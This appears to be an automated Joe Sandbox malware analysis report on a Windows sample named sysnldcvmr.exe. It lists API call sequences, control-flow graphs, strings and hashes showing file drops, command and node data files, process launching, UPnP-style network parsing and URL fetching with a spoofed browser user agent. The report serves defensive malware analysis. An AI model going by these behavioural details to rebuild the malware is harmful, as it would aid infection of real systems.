                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_sysnldcvmr.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Filewsprintf$CloseSleep$CreateDiskDrivesExitFreeHandleInformationLogicalModuleNameOpenQuerySizeSpaceThreadValueVolume_aulldivlstrcpy
                                                                                                                                                                                                                                                    • String ID: (%dGB)$%s%s$C:\Windows\sysnldcvmr.exe$Unnamed volume
                                                                                                                                                                                                                                                    • API String ID: 1650488544-3455140397
                                                                                                                                                                                                                                                    • Opcode ID: 3ff50a499cc3cb1ca5597e24ae18a8291f76a1d6cde0f573ca4de3ef4abdd767
                                                                                                                                                                                                                                                    • Instruction ID: f0476b63a1379e6dca01d87e2afc3553bbde202c422fcd3a3a6a752a7ad43008
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3ff50a499cc3cb1ca5597e24ae18a8291f76a1d6cde0f573ca4de3ef4abdd767
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 53418471900318ABEB14DB94DD45FEE7778BB44700F1045A9F20AA51D0DB785B94CF6A

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • memset.NTDLL ref: 00405898
                                                                                                                                                                                                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 004058B0
                                                                                                                                                                                                                                                    • Sleep.KERNEL32(00000001), ref: 004058C4
                                                                                                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 004058CA
                                                                                                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 004058D3
                                                                                                                                                                                                                                                    • wsprintfW.USER32 ref: 004058E6
                                                                                                                                                                                                                                                    • RegisterClassExW.USER32(00000030), ref: 004058F3
                                                                                                                                                                                                                                                    • CreateWindowExW.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,?,00000000), ref: 0040591C
                                                                                                                                                                                                                                                    • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 00405937
                                                                                                                                                                                                                                                    • TranslateMessage.USER32(?), ref: 00405945
                                                                                                                                                                                                                                                    • DispatchMessageA.USER32(?), ref: 0040594F
                                                                                                                                                                                                                                                    • ExitThread.KERNEL32 ref: 00405961
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000005.00000002.3943782870.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.3943663616.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.3943848105.0000000000410000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.3943945685.0000000000414000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.3944017098.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_sysnldcvmr.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Message$CountTick$ClassCreateDispatchExitHandleModuleRegisterSleepThreadTranslateWindowmemsetwsprintf
                                                                                                                                                                                                                                                    • String ID: %x%X$0
                                                                                                                                                                                                                                                    • API String ID: 716646876-225668902
                                                                                                                                                                                                                                                    • Opcode ID: 782a45269e3dbcd5f001198ba08731f5a4c25339978a850d22dce32c5997214b
                                                                                                                                                                                                                                                    • Instruction ID: 85e967beda8c0998690da8d5d0b59a8f0be79fc45de23a81cc248e6733ffc6a2
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 782a45269e3dbcd5f001198ba08731f5a4c25339978a850d22dce32c5997214b
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: DB211DB1940308BBEB10ABA0DC49FEE7B78EB04711F10812AF601BA1D0DBB99545CF68

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                    control_flow_graph 241 40e7c0-40e7ff CreateFileW 242 40e805-40e820 CreateFileMappingW 241->242 243 40e91a-40e91e 241->243 244 40e910-40e913 242->244 245 40e826-40e83f MapViewOfFile 242->245 246 40e920-40e940 CreateFileW 243->246 247 40e974-40e97a 243->247 244->243 248 40e845-40e85b GetFileSize 245->248 249 40e906-40e909 245->249 250 40e942-40e961 WriteFile 246->250 251 40e968-40e96c call 40a1b0 246->251 253 40e861-40e874 call 40c7f0 248->253 254 40e8fc-40e900 UnmapViewOfFile 248->254 249->244 250->251 255 40e971 251->255 253->254 258 40e87a-40e889 253->258 254->249 255->247 258->254 259 40e88b-40e8ab call 40c190 258->259 261 40e8b0-40e8ba 259->261 261->254 262 40e8bc-40e8e7 call 40a4e0 memcmp 261->262 262->254 265 40e8e9-40e8f5 call 40a1b0 262->265 265->254
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000), ref: 0040E7F2
                                                                                                                                                                                                                                                    • CreateFileMappingW.KERNELBASE(000000FF,00000000,00000002,00000000,00000000,00000000), ref: 0040E813
                                                                                                                                                                                                                                                    • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000), ref: 0040E832
                                                                                                                                                                                                                                                    • GetFileSize.KERNEL32(000000FF,00000000), ref: 0040E84B
                                                                                                                                                                                                                                                    • memcmp.NTDLL ref: 0040E8DD
                                                                                                                                                                                                                                                    • UnmapViewOfFile.KERNEL32(00000000), ref: 0040E900
                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 0040E90A
                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(000000FF), ref: 0040E914
                                                                                                                                                                                                                                                    • CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000000,00000000), ref: 0040E933
                                                                                                                                                                                                                                                    • WriteFile.KERNEL32(000000FF,00000000,00000000,00000000,00000000), ref: 0040E958
                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(000000FF), ref: 0040E962
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000005.00000002.3943782870.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.3943663616.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.3943848105.0000000000410000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.3943945685.0000000000414000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.3944017098.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_sysnldcvmr.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: File$CloseCreateHandle$View$MappingSizeUnmapWritememcmp
                                                                                                                                                                                                                                                    • String ID: .ou
                                                                                                                                                                                                                                                    • API String ID: 3902698870-3683031111
                                                                                                                                                                                                                                                    • Opcode ID: 3dd30dc439ad3f7a5ebd7dce9fe05c3210832a6c06382493a81f5afd8b17f853
                                                                                                                                                                                                                                                    • Instruction ID: 0da617c1af0bd4dbc976a582f880bbe3058530cb6ade4bb6176e088db5cb8200
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3dd30dc439ad3f7a5ebd7dce9fe05c3210832a6c06382493a81f5afd8b17f853
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D3516DB5E00308FBDB14DBA4CC49BEEB774AB48304F108569F611BB2C1D7B9AA40CB58

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                    control_flow_graph 268 40b2c0-40b2d8 InitializeCriticalSection 269 40b2e3-40b2ea 268->269 270 40b309-40b32a CreateFileW 269->270 271 40b2ec-40b2ff call 40d4a0 call 40aea0 269->271 272 40b330-40b34b CreateFileMappingW 270->272 273 40b3f2-40b415 call 40ab60 call 40d160 270->273 285 40b304-40b307 271->285 275 40b351-40b36a MapViewOfFile 272->275 276 40b3e8-40b3eb 272->276 279 40b36c-40b389 GetFileSize 275->279 280 40b3de-40b3e1 275->280 276->273 283 40b39d-40b3a3 279->283 280->276 287 40b3d4-40b3d8 UnmapViewOfFile 283->287 288 40b3a5-40b3ac 283->288 285->269 287->280 288->287 290 40b3ae-40b3d2 call 40d4a0 call 40aea0 288->290 290->283
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • InitializeCriticalSection.KERNEL32(00416690,?,?,?,?,?,?,00407A56), ref: 0040B2CB
                                                                                                                                                                                                                                                    • CreateFileW.KERNEL32(C:\Users\user\tbtnds.dat,80000000,00000000,00000000,00000003,00000000,00000000), ref: 0040B31D
                                                                                                                                                                                                                                                    • CreateFileMappingW.KERNEL32(000000FF,00000000,00000002,00000000,00000000,00000000), ref: 0040B33E
                                                                                                                                                                                                                                                    • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000), ref: 0040B35D
                                                                                                                                                                                                                                                    • GetFileSize.KERNEL32(000000FF,00000000), ref: 0040B372
                                                                                                                                                                                                                                                    • UnmapViewOfFile.KERNEL32(00000000), ref: 0040B3D8
                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 0040B3E2
                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(000000FF), ref: 0040B3EC
                                                                                                                                                                                                                                                      • Part of subcall function 0040D4A0: NtQuerySystemTime.NTDLL(0040B3B5,?,0040B3B5,00000000), ref: 0040D4AA
                                                                                                                                                                                                                                                      • Part of subcall function 0040D4A0: RtlTimeToSecondsSince1980.NTDLL(0040B3B5,?), ref: 0040D4B8
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000005.00000002.3943782870.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.3943663616.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.3943848105.0000000000410000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.3943945685.0000000000414000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.3944017098.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_sysnldcvmr.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: File$CloseCreateHandleTimeView$CriticalInitializeMappingQuerySecondsSectionSince1980SizeSystemUnmap
                                                                                                                                                                                                                                                    • String ID: C:\Users\user\tbtnds.dat$Vz@$.ou
                                                                                                                                                                                                                                                    • API String ID: 439099756-3072227601
                                                                                                                                                                                                                                                    • Opcode ID: 8d7cde204a8a1769cbf9c31fa4a0dcac597e6b6dcc3230a668d142432fe62379
                                                                                                                                                                                                                                                    • Instruction ID: 3b431581fb8605495e02e5545908ab4f756817927d1539066ca4ce1953719e7c
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8d7cde204a8a1769cbf9c31fa4a0dcac597e6b6dcc3230a668d142432fe62379
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 91411C74E40309EBDB10DFA4DC4ABAEB774EB44704F208569EA11BA2C1C7B96541CB9D

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                    control_flow_graph 296 405bc0-405bf2 InitializeCriticalSection CreateFileW 297 405ce5-405ce8 296->297 298 405bf8-405c13 CreateFileMappingW 296->298 299 405c19-405c32 MapViewOfFile 298->299 300 405cdb-405cde 298->300 301 405cd1-405cd4 299->301 302 405c38-405c4a GetFileSize 299->302 300->297 301->300 303 405c4d-405c51 302->303 304 405c53-405c5a 303->304 305 405cc7-405ccb UnmapViewOfFile 303->305 306 405c5c 304->306 307 405c5e-405c71 call 40c820 304->307 305->301 306->305 310 405c73 307->310 311 405c75-405c8a 307->311 310->305 312 405c9a-405cc5 call 405cf0 311->312 313 405c8c-405c98 call 40a1b0 311->313 312->303 313->305
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • InitializeCriticalSection.KERNEL32(00415E30,?,?,?,?,?,00407A20), ref: 00405BCB
                                                                                                                                                                                                                                                    • CreateFileW.KERNEL32(C:\Users\user\tbtcmds.dat,80000000,00000000,00000000,00000003,00000000,00000000,?,?,?,?,?,00407A20), ref: 00405BE5
                                                                                                                                                                                                                                                    • CreateFileMappingW.KERNEL32(000000FF,00000000,00000002,00000000,00000000,00000000), ref: 00405C06
                                                                                                                                                                                                                                                    • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000), ref: 00405C25
                                                                                                                                                                                                                                                    • GetFileSize.KERNEL32(000000FF,00000000), ref: 00405C3E
                                                                                                                                                                                                                                                    • UnmapViewOfFile.KERNEL32(00000000), ref: 00405CCB
                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 00405CD5
                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(000000FF), ref: 00405CDF
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000005.00000002.3943782870.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.3943663616.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.3943848105.0000000000410000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.3943945685.0000000000414000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.3944017098.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_sysnldcvmr.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: File$CloseCreateHandleView$CriticalInitializeMappingSectionSizeUnmap
                                                                                                                                                                                                                                                    • String ID: C:\Users\user\tbtcmds.dat$.ou
                                                                                                                                                                                                                                                    • API String ID: 3956458805-2669820434
                                                                                                                                                                                                                                                    • Opcode ID: 0d31e8e54dd4377960fe8f85c90de5e8a1c48912456c97c5d368e4304b7c840c
                                                                                                                                                                                                                                                    • Instruction ID: 44e1aa5071e985e1939c8a19f3b292d5e35966d71e561f6040ad28af9ac572d1
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0d31e8e54dd4377960fe8f85c90de5e8a1c48912456c97c5d368e4304b7c840c
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4B31FD74E44309EBEB14DBA4CD49BAFBB74EB48700F208569E601772C0D7B96941CF99

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                    control_flow_graph 318 40e980-40e9e0 memset * 2 CreateProcessW 319 40e9f1-40ea15 ShellExecuteW 318->319 320 40e9e2-40e9ef Sleep 318->320 322 40ea26 319->322 323 40ea17-40ea24 Sleep 319->323 321 40ea28-40ea2b 320->321 322->321 323->321
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • memset.NTDLL ref: 0040E98E
                                                                                                                                                                                                                                                    • memset.NTDLL ref: 0040E99E
                                                                                                                                                                                                                                                    • CreateProcessW.KERNEL32(00000000,Gy@,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?), ref: 0040E9D7
                                                                                                                                                                                                                                                    • Sleep.KERNEL32(000003E8), ref: 0040E9E7
                                                                                                                                                                                                                                                    • ShellExecuteW.SHELL32(00000000,open,Gy@,00000000,00000000,00000000), ref: 0040EA02
                                                                                                                                                                                                                                                    • Sleep.KERNEL32(000003E8), ref: 0040EA1C
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000005.00000002.3943782870.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.3943663616.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.3943848105.0000000000410000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.3943945685.0000000000414000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.3944017098.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_sysnldcvmr.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Sleepmemset$CreateExecuteProcessShell
                                                                                                                                                                                                                                                    • String ID: $D$Gy@$open
                                                                                                                                                                                                                                                    • API String ID: 3787208655-4184347819
                                                                                                                                                                                                                                                    • Opcode ID: 5ee7fdc591246df9419d0b661744b6941cf0467c5ddd8ade60e7ca7f41f9299c
                                                                                                                                                                                                                                                    • Instruction ID: afb7e97e53159593a654a1f5a0506a904f07d925a59540ad2b26a1d3cea08ed0
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5ee7fdc591246df9419d0b661744b6941cf0467c5ddd8ade60e7ca7f41f9299c
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 08114271A90308BBE710DB91CD46FDE7774AB04B00F200129F6087E2C1D6F9AA54CB59

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                    control_flow_graph 348 40d2d0-40d300 GetCurrentThread GetThreadPriority GetCurrentThread SetThreadPriority 349 40d306-40d31a InterlockedExchangeAdd 348->349 350 40d3e9-40d400 GetCurrentThread SetThreadPriority 348->350 349->350 351 40d320-40d329 349->351 352 40d32c-40d333 351->352 352->350 353 40d339-40d354 EnterCriticalSection 352->353 354 40d35f-40d367 353->354 355 40d3a7-40d3bc LeaveCriticalSection 354->355 356 40d369-40d376 354->356 357 40d3c7-40d3cd 355->357 358 40d3be-40d3c5 355->358 359 40d383-40d3a5 WaitForSingleObject 356->359 360 40d378-40d381 356->360 361 40d3dc-40d3e4 Sleep 357->361 362 40d3cf-40d3d8 357->362 358->350 363 40d356-40d35c 359->363 360->363 361->352 362->361 364 40d3da 362->364 363->354 364->350
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • GetCurrentThread.KERNEL32 ref: 0040D2D6
                                                                                                                                                                                                                                                    • GetThreadPriority.KERNEL32(00000000,?,?,?,00407AD2,009D0638,000000FF), ref: 0040D2DD
                                                                                                                                                                                                                                                    • GetCurrentThread.KERNEL32 ref: 0040D2E8
                                                                                                                                                                                                                                                    • SetThreadPriority.KERNEL32(00000000,?,?,?,00407AD2,009D0638,000000FF), ref: 0040D2EF
                                                                                                                                                                                                                                                    • InterlockedExchangeAdd.KERNEL32(00407AD2,00000000), ref: 0040D312
                                                                                                                                                                                                                                                    • EnterCriticalSection.KERNEL32(000000FB), ref: 0040D347
                                                                                                                                                                                                                                                    • WaitForSingleObject.KERNEL32(000000FF,00000000), ref: 0040D392
                                                                                                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(000000FB), ref: 0040D3AE
                                                                                                                                                                                                                                                    • Sleep.KERNEL32(00000001), ref: 0040D3DE
                                                                                                                                                                                                                                                    • GetCurrentThread.KERNEL32 ref: 0040D3ED
                                                                                                                                                                                                                                                    • SetThreadPriority.KERNEL32(00000000,?,?,?,00407AD2), ref: 0040D3F4
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000005.00000002.3943782870.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.3943663616.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.3943848105.0000000000410000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.3943945685.0000000000414000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.3944017098.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_sysnldcvmr.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Thread$CurrentPriority$CriticalSection$EnterExchangeInterlockedLeaveObjectSingleSleepWait
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 3862671961-0
                                                                                                                                                                                                                                                    • Opcode ID: 5618e667e755a89869c685173e38bf799e2d1f6c3c7819217eae43ff0fa2d7e3
                                                                                                                                                                                                                                                    • Instruction ID: a8d0ef9cc0f8c3f9fe641a145e15df681aa384361be6a62e8494921e8eef4e23
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5618e667e755a89869c685173e38bf799e2d1f6c3c7819217eae43ff0fa2d7e3
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0A411A74D00209EFDB04DFE4D888BAEBB71EB44315F14816AE916A7380D7789A85CF5A

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                    control_flow_graph 383 40ab80-40ab8d 384 40ab94-40abb2 call 409fa0 383->384 385 40ab8f 383->385 386 40ac6c-40ac6f 384->386 389 40abb8-40abbf 384->389 385->386 390 40abca-40abd3 389->390 391 40ac04-40ac25 CreateFileW 390->391 392 40abd5-40ac02 390->392 394 40ac53-40ac69 InterlockedExchange call 40a1b0 391->394 395 40ac27-40ac4c WriteFile FlushFileBuffers 391->395 392->390 394->386 395->394
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • CreateFileW.KERNEL32(C:\Users\user\tbtnds.dat,40000000,00000000,00000000,00000002,00000002,00000000), ref: 0040AC18
                                                                                                                                                                                                                                                    • WriteFile.KERNEL32(000000FF,00000000,?,?,00000000), ref: 0040AC39
                                                                                                                                                                                                                                                    • FlushFileBuffers.KERNEL32(000000FF), ref: 0040AC43
                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(000000FF), ref: 0040AC4D
                                                                                                                                                                                                                                                    • InterlockedExchange.KERNEL32(00415260,0000003D), ref: 0040AC5A
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000005.00000002.3943782870.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.3943663616.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.3943848105.0000000000410000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.3943945685.0000000000414000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.3944017098.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_sysnldcvmr.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: File$BuffersCloseCreateExchangeFlushHandleInterlockedWrite
                                                                                                                                                                                                                                                    • String ID: C:\Users\user\tbtnds.dat$.ou
                                                                                                                                                                                                                                                    • API String ID: 442028454-3213903240
                                                                                                                                                                                                                                                    • Opcode ID: 32a3c22131d2a02b3799ca2c8e2e6ace852a549deac0f95c4e37c00c6502dd7f
                                                                                                                                                                                                                                                    • Instruction ID: b83d763b1b95064d17473309c927232932c49c75998401e70db37280cdfd902f
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 32a3c22131d2a02b3799ca2c8e2e6ace852a549deac0f95c4e37c00c6502dd7f
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 46318CB4E00208EFDB00CF94EC85FAEB775BB48300F218569E515A7390C774AA51CB59

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                    control_flow_graph 398 40d890-40d8aa 399 40d8bb-40d8c2 398->399 400 40d974-40d97d 399->400 401 40d8c8-40d8e7 recvfrom 399->401 402 40d8f6-40d913 StrCmpNIA 401->402 403 40d8e9-40d8f4 Sleep 401->403 405 40d915-40d934 StrStrIA 402->405 406 40d96f 402->406 404 40d8ac-40d8b5 403->404 404->399 405->406 407 40d936-40d96d StrChrA call 40c8a0 405->407 406->404 407->406
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • recvfrom.WS2_32(000000FF,?,00000400,00000000,00000000,00000000), ref: 0040D8DE
                                                                                                                                                                                                                                                    • Sleep.KERNEL32(000003E8), ref: 0040D8EE
                                                                                                                                                                                                                                                    • StrCmpNIA.SHLWAPI(?,HTTP/1.1 200 OK,0000000F), ref: 0040D90B
                                                                                                                                                                                                                                                    • StrStrIA.SHLWAPI(?,LOCATION: ), ref: 0040D921
                                                                                                                                                                                                                                                    • StrChrA.SHLWAPI(?,0000000D), ref: 0040D94E
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000005.00000002.3943782870.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.3943663616.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.3943848105.0000000000410000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.3943945685.0000000000414000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.3944017098.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_sysnldcvmr.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Sleeprecvfrom
                                                                                                                                                                                                                                                    • String ID: HTTP/1.1 200 OK$LOCATION:
                                                                                                                                                                                                                                                    • API String ID: 668330359-3973262388
                                                                                                                                                                                                                                                    • Opcode ID: 64c51f4f778a0849bb65c465f972bc246fe4ea33ddc01750ea485b3e9e3c6488
                                                                                                                                                                                                                                                    • Instruction ID: aa1d0310fbaa0e5548ad160d3530673878f91993e129ff42f305da2a80d3425b
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 64c51f4f778a0849bb65c465f972bc246fe4ea33ddc01750ea485b3e9e3c6488
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 88215EB5D00218ABDB20DF64DC49BE97774AB04708F1486E9E719B62C0C7B95ACA8F5C
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • InternetOpenA.WININET(Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36,00000001,00000000,00000000,00000000), ref: 0040EA47
                                                                                                                                                                                                                                                    • InternetOpenUrlA.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 0040EA66
                                                                                                                                                                                                                                                    • HttpQueryInfoA.WININET(00000000,20000005,?,00000004,00000000), ref: 0040EA8F
                                                                                                                                                                                                                                                    • InternetCloseHandle.WININET(00000000), ref: 0040EAB8
                                                                                                                                                                                                                                                    • InternetCloseHandle.WININET(00000000), ref: 0040EAC2
                                                                                                                                                                                                                                                    • Sleep.KERNEL32(000003E8), ref: 0040EACD
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    • Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36, xrefs: 0040EA42
                                                                                                                                                                                                                                                    Memory Dump Source
